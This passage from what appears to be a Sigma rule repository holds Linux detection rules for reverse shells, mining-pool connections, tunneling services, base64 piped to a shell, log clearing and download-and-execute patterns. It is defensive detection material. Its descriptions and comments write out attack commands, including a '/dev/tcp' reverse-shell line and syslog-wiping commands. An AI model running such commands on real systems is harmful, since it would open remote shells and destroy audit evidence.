Image|endswith: '/wget'
TargetFilename|startswith:
- '/tmp/'
- '/var/tmp/'
condition: selection
falsepositives:
- Legitimate downloads of files in the tmp folder.
level: medium
================================================
FILE: rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml
================================================
title: Linux Reverse Shell Indicator
id: 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871
status: test
description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
references:
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
author: Florian Roth (Nextron Systems)
date: 2021-10-16
modified: 2022-12-25
tags:
- attack.execution
- attack.t1059.004
logsource:
product: linux
category: network_connection
detection:
selection:
Image|endswith: '/bin/bash'
filter:
DestinationIp:
- '127.0.0.1'
- '0.0.0.0'
condition: selection and not filter
falsepositives:
- Unknown
level: critical
================================================
FILE: rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml
================================================
title: Linux Crypto Mining Pool Connections
id: a46c93b7-55ed-4d27-a41b-c259456c4746
status: stable
description: Detects process connections to a Monero crypto mining pool
references:
- https://www.poolwatch.io/coin/monero
author: Florian Roth (Nextron Systems)
date: 2021-10-26
tags:
- attack.impact
- attack.t1496
logsource:
product: linux
category: network_connection
detection:
selection:
DestinationHostname:
- 'pool.minexmr.com'
- 'fr.minexmr.com'
- 'de.minexmr.com'
- 'sg.minexmr.com'
- 'ca.minexmr.com'
- 'us-west.minexmr.com'
- 'pool.supportxmr.com'
- 'mine.c3pool.com'
- 'xmr-eu1.nanopool.org'
- 'xmr-eu2.nanopool.org'
- 'xmr-us-east1.nanopool.org'
- 'xmr-us-west1.nanopool.org'
- 'xmr-asia1.nanopool.org'
- 'xmr-jp1.nanopool.org'
- 'xmr-au1.nanopool.org'
- 'xmr.2miners.com'
- 'xmr.hashcity.org'
- 'xmr.f2pool.com'
- 'xmrpool.eu'
- 'pool.hashvault.pro'
- 'moneroocean.stream'
- 'monerocean.stream'
condition: selection
falsepositives:
- Legitimate use of crypto miners
level: high
================================================
FILE: rules/linux/network_connection/net_connection_lnx_domain_localtonet_tunnel.yml
================================================
title: Communication To LocaltoNet Tunneling Service Initiated - Linux
id: c4568f5d-131f-4e78-83d4-45b2da0ec4f1
status: test
description: |
Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains.
LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet.
Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.
references:
- https://localtonet.com/documents/supported-tunnels
- https://cloud.google.com/blog/topics/threat-intelligence/unc3944-targets-saas-applications
author: Andreas Braathen (mnemonic.io)
date: 2024-06-17
tags:
- attack.command-and-control
- attack.t1572
- attack.t1090
- attack.t1102
logsource:
category: network_connection
product: linux
detection:
selection:
DestinationHostname|endswith:
- '.localto.net'
- '.localtonet.com'
Initiated: 'true'
condition: selection
falsepositives:
- Legitimate use of the LocaltoNet service.
level: high
================================================
FILE: rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml
================================================
title: Communication To Ngrok Tunneling Service - Linux
id: 19bf6fdb-7721-4f3d-867f-53467f6a5db6
status: test
description: Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors
references:
- https://twitter.com/hakluke/status/1587733971814977537/photo/1
- https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent
author: Florian Roth (Nextron Systems)
date: 2022-11-03
tags:
- attack.exfiltration
- attack.command-and-control
- attack.t1567
- attack.t1568.002
- attack.t1572
- attack.t1090
- attack.t1102
- attack.s0508
logsource:
product: linux
category: network_connection
detection:
selection:
DestinationHostname|contains:
- 'tunnel.us.ngrok.com'
- 'tunnel.eu.ngrok.com'
- 'tunnel.ap.ngrok.com'
- 'tunnel.au.ngrok.com'
- 'tunnel.sa.ngrok.com'
- 'tunnel.jp.ngrok.com'
- 'tunnel.in.ngrok.com'
condition: selection
falsepositives:
- Legitimate use of ngrok
level: high
================================================
FILE: rules/linux/network_connection/net_connection_lnx_susp_malware_callback_port.yml
================================================
title: Potentially Suspicious Malware Callback Communication - Linux
id: dbfc7c98-04ab-4ab7-aa94-c74d22aa7376
related:
- id: 4b89abaa-99fe-4232-afdd-8f9aa4d20382
type: derived
status: test
description: |
Detects programs that connect to known malware callback ports based on threat intelligence reports.
references:
- https://www.mandiant.com/resources/blog/triton-actor-ttp-profile-custom-attack-tools-detections
- https://www.mandiant.com/resources/blog/ukraine-and-sandworm-team
- https://www.elastic.co/guide/en/security/current/potential-non-standard-port-ssh-connection.html
- https://thehackernews.com/2024/01/systembc-malwares-c2-server-analysis.html
- https://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors
author: hasselj
date: 2024-05-10
tags:
- attack.persistence
- attack.command-and-control
- attack.t1571
logsource:
category: network_connection
product: linux
detection:
selection:
Initiated: 'true'
DestinationPort:
- 888
- 999
- 2200
- 2222
- 4000
- 4444
- 6789
- 8531
- 50501
- 51820
filter_main_local_ranges:
DestinationIp|cidr:
- '127.0.0.0/8'
- '10.0.0.0/8'
- '172.16.0.0/12'
- '192.168.0.0/16'
- '169.254.0.0/16'
- '::1/128' # IPv6 loopback
- 'fe80::/10' # IPv6 link-local addresses
- 'fc00::/7' # IPv6 private addresses
condition: selection and not 1 of filter_main_*
falsepositives:
- Unknown
level: high
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_apt_shell_execution.yml
================================================
title: Shell Invocation via Apt - Linux
id: bb382fd5-b454-47ea-a264-1828e4c766d6
status: test
description: |
Detects the use of the "apt" and "apt-get" commands to execute a shell or proxy commands.
Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
references:
- https://gtfobins.github.io/gtfobins/apt/
- https://gtfobins.github.io/gtfobins/apt-get/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-12-28
modified: 2024-09-02
tags:
- attack.discovery
- attack.t1083
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith:
- '/apt'
- '/apt-get'
CommandLine|contains: 'APT::Update::Pre-Invoke::='
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_at_command.yml
================================================
title: Scheduled Task/Job At
id: d2d642d7-b393-43fe-bae4-e81ed5915c4b
status: stable
description: |
Detects the use of at/atd which are utilities that are used to schedule tasks.
They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md
author: Ömer Günal, oscd.community
date: 2020-10-06
modified: 2022-07-07
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.t1053.002
logsource:
product: linux
category: process_creation
detection:
selection:
Image|endswith:
- '/at'
- '/atd'
condition: selection
falsepositives:
- Legitimate administration activities
level: low
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_auditctl_clear_rules.yml
================================================
title: Audit Rules Deleted Via Auditctl
id: bed26dea-4525-47f4-b24a-76e30e44ffb0
status: experimental
description: |
Detects the execution of 'auditctl' with the '-D' command line parameter, which deletes all configured audit rules and watches on Linux systems.
This technique is commonly used by attackers to disable audit logging and cover their tracks by removing monitoring capabilities.
Removal of audit rules can significantly impair detection of malicious activities on the affected system.
references:
- https://www.atomicredteam.io/atomic-red-team/atomics/T1562.012
- https://linux.die.net/man/8/auditct
author: Mohamed LAKRI
date: 2025-10-17
tags:
- attack.defense-evasion
- attack.t1562.012
logsource:
product: linux
category: process_creation
detection:
selection:
Image|endswith: '/auditctl'
CommandLine|re: '-D'
condition: selection
falsepositives:
- An administrator troubleshooting. Investigate all attempts.
level: high
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_av_kaspersky_av_disabled.yml
================================================
title: Kaspersky Endpoint Security Stopped Via CommandLine - Linux
id: 36388120-b3f1-4ce9-b50b-280d9a7f4c04
status: experimental
description: |
Detects execution of the Kaspersky init.d stop script on Linux systems either directly or via systemctl.
This activity may indicate a manual interruption of the antivirus service by an administrator, or it could be a sign of potential tampering or evasion attempts by malicious actors.
references:
- https://support.kaspersky.com/KES4Linux/12.0.0/en-US/197929.htm
author: Milad Cheraghi
date: 2025-10-18
tags:
- attack.execution
- attack.defense-evasion
- attack.t1562.001
logsource:
product: linux
category: process_creation
detection:
selection:
Image|endswith:
# Note: Add the list of shells allowed in your environment that can be used to run init.d scripts.
- '/systemctl'
- '/bash'
- '/sh'
CommandLine|contains|all:
- 'stop'
- 'kesl'
condition: selection
falsepositives:
- System administrator manually stopping Kaspersky services
level: high
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_awk_shell_spawn.yml
================================================
title: Suspicious Invocation of Shell via AWK - Linux
id: 8c1a5675-cb85-452f-a298-b01b22a51856
status: test
description: |
Detects the execution of "awk" or it's sibling commands, to invoke a shell using the system() function.
This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.
references:
- https://gtfobins.github.io/gtfobins/awk/#shell
- https://gtfobins.github.io/gtfobins/gawk/#shell
- https://gtfobins.github.io/gtfobins/nawk/#shell
- https://gtfobins.github.io/gtfobins/mawk/#shell
author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
date: 2024-09-02
tags:
- attack.execution
- attack.t1059
logsource:
category: process_creation
product: linux
detection:
selection_img:
Image|endswith:
- '/awk'
- '/gawk'
- '/mawk'
- '/nawk'
CommandLine|contains: 'BEGIN {system'
selection_cli:
CommandLine|contains:
- '/bin/bash'
- '/bin/dash'
- '/bin/fish'
- '/bin/sh'
- '/bin/zsh'
condition: all of selection_*
falsepositives:
- Unknown
level: high
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_base64_decode.yml
================================================
title: Decode Base64 Encoded Text
id: e2072cab-8c9a-459b-b63c-40ae79e27031
status: test
description: Detects usage of base64 utility to decode arbitrary base64-encoded text
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md
author: Daniil Yugoslavskiy, oscd.community
date: 2020-10-19
modified: 2021-11-27
tags:
- attack.defense-evasion
- attack.t1027
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith: '/base64'
CommandLine|contains: '-d' # Also covers "--decode"
condition: selection
falsepositives:
- Legitimate activities
level: low
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_base64_execution.yml
================================================
title: Linux Base64 Encoded Pipe to Shell
id: ba592c6d-6888-43c3-b8c6-689b8fe47337
status: test
description: Detects suspicious process command line that uses base64 encoded input for execution with a shell
references:
- https://github.com/arget13/DDexec
- https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally
author: pH-T (Nextron Systems)
date: 2022-07-26
modified: 2023-06-16
tags:
- attack.defense-evasion
- attack.t1140
logsource:
product: linux
category: process_creation
detection:
selection_base64:
CommandLine|contains: 'base64 '
selection_exec:
- CommandLine|contains:
- '| bash '
- '| sh '
- '|bash '
- '|sh '
- CommandLine|endswith:
- ' |sh'
- '| bash'
- '| sh'
- '|bash'
condition: all of selection_*
falsepositives:
- Legitimate administration activities
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml
================================================
title: Linux Base64 Encoded Shebang In CLI
id: fe2f9663-41cb-47e2-b954-8a228f3b9dff
status: test
description: Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded
references:
- https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html
- https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-09-15
tags:
- attack.defense-evasion
- attack.t1140
logsource:
product: linux
category: process_creation
detection:
selection:
CommandLine|contains:
- "IyEvYmluL2Jhc2" # Note: #!/bin/bash"
- "IyEvYmluL2Rhc2" # Note: #!/bin/dash"
- "IyEvYmluL3pza" # Note: #!/bin/zsh"
- "IyEvYmluL2Zpc2" # Note: #!/bin/fish
- "IyEvYmluL3No" # Note: # !/bin/sh"
condition: selection
falsepositives:
- Legitimate administration activities
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_bash_interactive_shell.yml
================================================
title: Bash Interactive Shell
id: 6104e693-a7d6-4891-86cb-49a258523559
status: test
description: Detects execution of the bash shell with the interactive flag "-i".
references:
- https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
- https://www.revshells.com/
- https://linux.die.net/man/1/bash
author: '@d4ns4n_'
date: 2023-04-07
tags:
- attack.execution
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith: '/bash'
CommandLine|contains: ' -i '
condition: selection
falsepositives:
- Unknown
level: low
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_bpf_kprob_tracing_enabled.yml
================================================
title: Enable BPF Kprobes Tracing
id: 7692f583-bd30-4008-8615-75dab3f08a99
status: test
description: Detects common command used to enable bpf kprobes tracing
references:
- https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/
- https://bpftrace.org/
- https://www.kernel.org/doc/html/v5.0/trace/kprobetrace.html
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-25
tags:
- attack.execution
- attack.defense-evasion
logsource:
category: process_creation
product: linux
detection:
selection:
CommandLine|contains|all:
- 'echo 1 >'
- '/sys/kernel/debug/tracing/events/kprobes/'
CommandLine|contains:
- '/myprobe/enable'
- '/myretprobe/enable'
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml
================================================
title: BPFtrace Unsafe Option Usage
id: f8341cb2-ee25-43fa-a975-d8a5a9714b39
status: test
description: Detects the usage of the unsafe bpftrace option
references:
- https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/
- https://bpftrace.org/
author: Andreas Hunkeler (@Karneades)
date: 2022-02-11
tags:
- attack.execution
- attack.t1059.004
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith: 'bpftrace'
CommandLine|contains: '--unsafe'
condition: selection
falsepositives:
- Legitimate usage of the unsafe option
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_cap_setgid.yml
================================================
title: Linux Setgid Capability Set on a Binary via Setcap Utility
id: 3a716279-c18c-4488-83be-f9ececbfb9fc
status: experimental
description: |
Detects the use of the 'setcap' utility to set the 'setgid' capability (cap_setgid) on a binary file.
This capability allows a non privileged process to make arbitrary manipulations of group IDs (GIDs), including setting its current GID to a value that would otherwise be restricted (i.e. GID 0, the root group).
This behavior can be used by adversaries to backdoor a binary in order to escalate privileges again in the future if needed.
references:
- https://man7.org/linux/man-pages/man8/setcap.8.html
- https://dfir.ch/posts/linux_capabilities/
- https://juggernaut-sec.com/capabilities/#cap_setgid
author: Luc Génaux
date: 2026-01-24
tags:
- attack.privilege-escalation
- attack.defense-evasion
- attack.persistence
- attack.t1548
- attack.t1554
logsource:
product: linux
category: process_creation
detection:
selection:
Image|endswith: '/setcap'
CommandLine|contains: 'cap_setgid'
condition: selection
falsepositives:
- Unknown
level: low
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_cap_setuid.yml
================================================
title: Linux Setuid Capability Set on a Binary via Setcap Utility
id: ed447910-bc30-4575-a598-3a2e49516a7a
status: experimental
description: |
Detects the use of the 'setcap' utility to set the 'setuid' capability (cap_setuid) on a binary file.
This capability allows a non privileged process to make arbitrary manipulations of user IDs (UIDs), including setting its current UID to a value that would otherwise be restricted (i.e. UID 0, the root user).
This behavior can be used by adversaries to backdoor a binary in order to escalate privileges again in the future if needed.
references:
- https://man7.org/linux/man-pages/man8/setcap.8.html
- https://dfir.ch/posts/linux_capabilities/
- https://juggernaut-sec.com/capabilities/#cap_setuid
author: Luc Génaux
date: 2026-01-24
tags:
- attack.privilege-escalation
- attack.defense-evasion
- attack.persistence
- attack.t1548
- attack.t1554
logsource:
product: linux
category: process_creation
detection:
selection:
Image|endswith: '/setcap'
CommandLine|contains: 'cap_setuid'
condition: selection
falsepositives:
- Unknown
level: low
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml
================================================
title: Capabilities Discovery - Linux
id: d8d97d51-122d-4cdd-9e2f-01b4b4933530
status: test
description: Detects usage of "getcap" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other.
references:
- https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes
- https://github.com/carlospolop/PEASS-ng
- https://github.com/diego-treitos/linux-smart-enumeration
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-12-28
modified: 2026-01-24
tags:
- attack.discovery
- attack.t1083
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith: '/getcap'
CommandLine|contains: ' -r '
condition: selection
falsepositives:
- Unknown
level: low
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_capsh_shell_invocation.yml
================================================
title: Capsh Shell Invocation - Linux
id: db1ac3be-f606-4e3a-89e0-9607cbe6b98a
status: test
description: |
Detects the use of the "capsh" utility to invoke a shell.
references:
- https://gtfobins.github.io/gtfobins/capsh/#shell
- https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html
author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
date: 2024-09-02
tags:
- attack.execution
- attack.t1059
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith: '/capsh'
CommandLine|endswith: ' --'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml
================================================
title: Remove Immutable File Attribute
id: 34979410-e4b5-4e5d-8cfb-389fdff05c12
related:
- id: a5b977d6-8a81-4475-91b9-49dbfcd941f7
type: derived
status: test
description: Detects usage of the 'chattr' utility to remove immutable file attribute.
references:
- https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-09-15
tags:
- attack.defense-evasion
- attack.t1222.002
logsource:
product: linux
category: process_creation
detection:
selection:
Image|endswith: '/chattr'
CommandLine|contains: ' -i '
condition: selection
falsepositives:
- Administrator interacting with immutable files (e.g. for instance backups).
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_chroot_execution.yml
================================================
title: Linux Sudo Chroot Execution
id: f2bed782-994e-4f40-9cd5-518198cb3fba
status: experimental
description: |
Detects the execution of 'sudo' command with '--chroot' option, which is used to change the root directory for command execution.
Attackers may use this technique to evade detection and execute commands in a modified environment.
This can be part of a privilege escalation strategy, as it allows the execution of commands with elevated privileges in a controlled environment as seen in CVE-2025-32463.
While investigating, look out for unusual or unexpected use of 'sudo --chroot' in conjunction with other commands or scripts such as execution from temporary directories or unusual user accounts.
references:
- https://github.com/kh4sh3i/CVE-2025-32463/blob/81bb430f84fa2089224733c3ed4bfa434c197ad4/exploit.sh
author: Swachchhanda Shrawn Poudel (Nextron Systems)
date: 2025-10-02
tags:
- attack.privilege-escalation
- attack.t1068
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith: '/sudo'
CommandLine|contains:
- ' --chroot '
- 'sudo -R '
condition: selection
falsepositives:
- Legitimate administrative tasks or scripts that use 'sudo --chroot' for containerization, testing, or system management.
level: low
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_clear_logs.yml
================================================
title: Clear Linux Logs
id: 80915f59-9b56-4616-9de0-fd0dea6c12fe
status: stable
description: Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md
author: Ömer Günal, oscd.community
date: 2020-10-07
modified: 2022-09-15
tags:
- attack.defense-evasion
- attack.t1070.002
logsource:
product: linux
category: process_creation
detection:
selection:
Image|endswith:
- '/rm' # covers /rmdir as well
- '/shred'
- '/unlink'
CommandLine|contains:
- '/var/log'
- '/var/spool/mail'
condition: selection
falsepositives:
- Legitimate administration activities
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml
================================================
title: Syslog Clearing or Removal Via System Utilities
id: 3fcc9b35-39e4-44c0-a2ad-9e82b6902b31
status: test
description: |
Detects specific commands commonly used to remove or empty the syslog. Which is a technique often used by attacker as a method to hide their tracks
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md
- https://www.virustotal.com/gui/file/54d60fd58d7fa3475fa123985bfc1594df26da25c1f5fbc7dfdba15876dd8ac5/behavior
author: Max Altgelt (Nextron Systems), Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
date: 2021-10-15
modified: 2025-10-15
tags:
- attack.defense-evasion
- attack.t1070.002
logsource:
product: linux
category: process_creation
detection:
selection_file:
CommandLine|contains: '/var/log/syslog'
selection_command_rm:
# Examples:
# rm -f /var/log/syslog
Image|endswith: '/rm'
CommandLine|contains:
- ' -r '
- ' -f '
- ' -rf '
- '/var/log/syslog' # We use this to avoid re-writing a separate selection
selection_command_unlink:
# Examples:
# unlink /var/log/syslog
Image|endswith: '/unlink'
selection_command_mv:
# Examples:
# mv /var/log/syslog
Image|endswith: '/mv'
selection_command_truncate:
# Examples:
# truncate --size 0 /var/log/syslog
Image|endswith: '/truncate'
CommandLine|contains|all:
- '0 '
- '/var/log/syslog' # We use this to avoid re-writing a separate selection
CommandLine|contains:
- '-s '
- '-c '
- '--size'
selection_command_ln:
# Examples:
# ln -sfn /dev/null /var/log/syslog
Image|endswith: '/ln'
CommandLine|contains|all:
- '/dev/null '
- '/var/log/syslog' # We use this to avoid re-writing a separate selection
CommandLine|contains:
- '-sf '
- '-sfn '
- '-sfT '
selection_command_cp:
# Examples:
# cp /dev/null /var/log/syslog
Image|endswith: '/cp'
CommandLine|contains: '/dev/null'
selection_command_shred:
# Examples:
# shred -u /var/log/syslog
Image|endswith: '/shred'
CommandLine|contains: '-u '
selection_unique_other:
CommandLine|contains:
- ' > /var/log/syslog'
- ' >/var/log/syslog'
- ' >| /var/log/syslog' # redirection empties w spacing, noclobber
- ': > /var/log/syslog'
- ':> /var/log/syslog'
- ':>/var/log/syslog'
- '>|/var/log/syslog'
selection_unique_journalctl:
CommandLine|contains:
- 'journalctl --vacuum'
- 'journalctl --rotate' # archives current journal files and creates new empty ones
condition: (selection_file and 1 of selection_command_*) or 1 of selection_unique_*
falsepositives:
- Log rotation.
- Maintenance.
level: high
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml
================================================
title: Clipboard Collection with Xclip Tool
id: ec127035-a636-4b9a-8555-0efd4e59f316
status: test
description: |
Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed.
Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.
references:
- https://www.packetlabs.net/posts/clipboard-data-security/
author: Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
date: 2021-10-15
modified: 2022-09-15
tags:
- attack.collection
- attack.t1115
logsource:
product: linux
category: process_creation
detection:
selection:
Image|contains: 'xclip'
CommandLine|contains|all:
- '-sel'
- 'clip'
- '-o'
condition: selection
falsepositives:
- Legitimate usage of xclip tools.
level: low
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_cp_passwd_or_shadow_tmp.yml
================================================
title: Copy Passwd Or Shadow From TMP Path
id: fa4aaed5-4fe0-498d-bbc0-08e3346387ba
status: test
description: Detects when the file "passwd" or "shadow" is copied from tmp path
references:
- https://blogs.blackberry.com/
- https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2023-01-31
tags:
- attack.credential-access
- attack.t1552.001
logsource:
product: linux
category: process_creation
detection:
selection_img:
Image|endswith: '/cp'
selection_path:
CommandLine|contains: '/tmp/'
selection_file:
CommandLine|contains:
- 'passwd'
- 'shadow'
condition: all of selection_*
falsepositives:
- Unknown
level: high
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_crontab_enumeration.yml
================================================
title: Crontab Enumeration
id: 403ed92c-b7ec-4edd-9947-5b535ee12d46
status: test
description: Detects usage of crontab to list the tasks of the user
references:
- https://blogs.jpcert.or.jp/en/2023/05/gobrat.html
- https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/
- https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection
- https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2023-06-02
tags:
- attack.discovery
- attack.t1007
logsource:
product: linux
category: process_creation
detection:
selection:
Image|endswith: '/crontab'
CommandLine|contains: ' -l'
condition: selection
falsepositives:
- Legitimate use of crontab
level: low
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml
================================================
title: Remove Scheduled Cron Task/Job
id: c2e234de-03a3-41e1-b39a-1e56dc17ba67
status: test
description: |
Detects usage of the 'crontab' utility to remove the current crontab.
This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible
references:
- https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-09-15
tags:
- attack.defense-evasion
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith: 'crontab'
CommandLine|contains: ' -r'
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml
================================================
title: Linux Crypto Mining Indicators
id: 9069ea3c-b213-4c52-be13-86506a227ab1
status: test
description: Detects command line parameters or strings often used by crypto miners
references:
- https://www.poolwatch.io/coin/monero
author: Florian Roth (Nextron Systems)
date: 2021-10-26
modified: 2022-12-25
tags:
- attack.impact
- attack.t1496
logsource:
product: linux
category: process_creation
detection:
selection:
CommandLine|contains:
- ' --cpu-priority='
- '--donate-level=0'
- ' -o pool.'
- ' --nicehash'
- ' --algo=rx/0 '
- 'stratum+tcp://'
- 'stratum+udp://'
# Sub process started by xmrig - the most popular Monero crypto miner - unknown if this causes any false positives
- 'sh -c /sbin/modprobe msr allow_writes=on'
# base64 encoded: --donate-level=
- 'LS1kb25hdGUtbGV2ZWw9'
- '0tZG9uYXRlLWxldmVsP'
- 'tLWRvbmF0ZS1sZXZlbD'
# base64 encoded: stratum+tcp:// and stratum+udp://
- 'c3RyYXR1bSt0Y3A6Ly'
- 'N0cmF0dW0rdGNwOi8v'
- 'zdHJhdHVtK3RjcDovL'
- 'c3RyYXR1bSt1ZHA6Ly'
- 'N0cmF0dW0rdWRwOi8v'
- 'zdHJhdHVtK3VkcDovL'
condition: selection
falsepositives:
- Legitimate use of crypto miners
level: high
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_curl_usage.yml
================================================
title: Curl Usage on Linux
id: ea34fb97-e2c4-4afb-810f-785e4459b194
status: test
description: Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server
references:
- https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-09-15
tags:
- attack.command-and-control
- attack.t1105
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith: '/curl'
condition: selection
falsepositives:
- Scripts created by developers and admins
- Administrative activity
level: low
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_curl_wget_exec_tmp.yml
================================================
title: Suspicious Download and Execute Pattern via Curl/Wget
id: a2d9e2f3-0f43-4c7a-bcd9-9acfc0d723aa
status: experimental
description: |
Detects suspicious use of command-line tools such as curl or wget to download remote
content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by
immediate execution, indicating potential malicious activity. This pattern is commonly used
by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks.
references:
- https://gtfobins.github.io/gtfobins/wget/
- https://gtfobins.github.io/gtfobins/curl/
author: Aayush Gupta
date: 2025-06-17
tags:
- attack.execution
- attack.t1059.004
- attack.t1203
logsource:
category: process_creation
product: linux
detection:
selection_downloader:
CommandLine|contains:
- '/curl'
- '/wget'
selection_tmp:
CommandLine|contains:
- '/tmp/'
- '/dev/shm/'
selection_executor:
CommandLine|contains: 'sh -c'
condition: all of selection_*
falsepositives:
- System update scripts using temporary files
- Installer scripts or automated provisioning tools
level: high
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_dd_file_overwrite.yml
================================================
title: DD File Overwrite
id: 2953194b-e33c-4859-b9e8-05948c167447
status: test
description: Detects potential overwriting and deletion of a file using DD.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-2---macoslinux---overwrite-file-with-dd
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
date: 2021-10-15
modified: 2022-07-07
tags:
- attack.impact
- attack.t1485
logsource:
product: linux
category: process_creation
detection:
selection1:
Image:
- '/bin/dd'
- '/usr/bin/dd'
selection2:
CommandLine|contains: 'of='
selection3:
CommandLine|contains:
- 'if=/dev/zero'
- 'if=/dev/null'
condition: all of selection*
falsepositives:
- Any user deleting files that way.
level: low
================================================
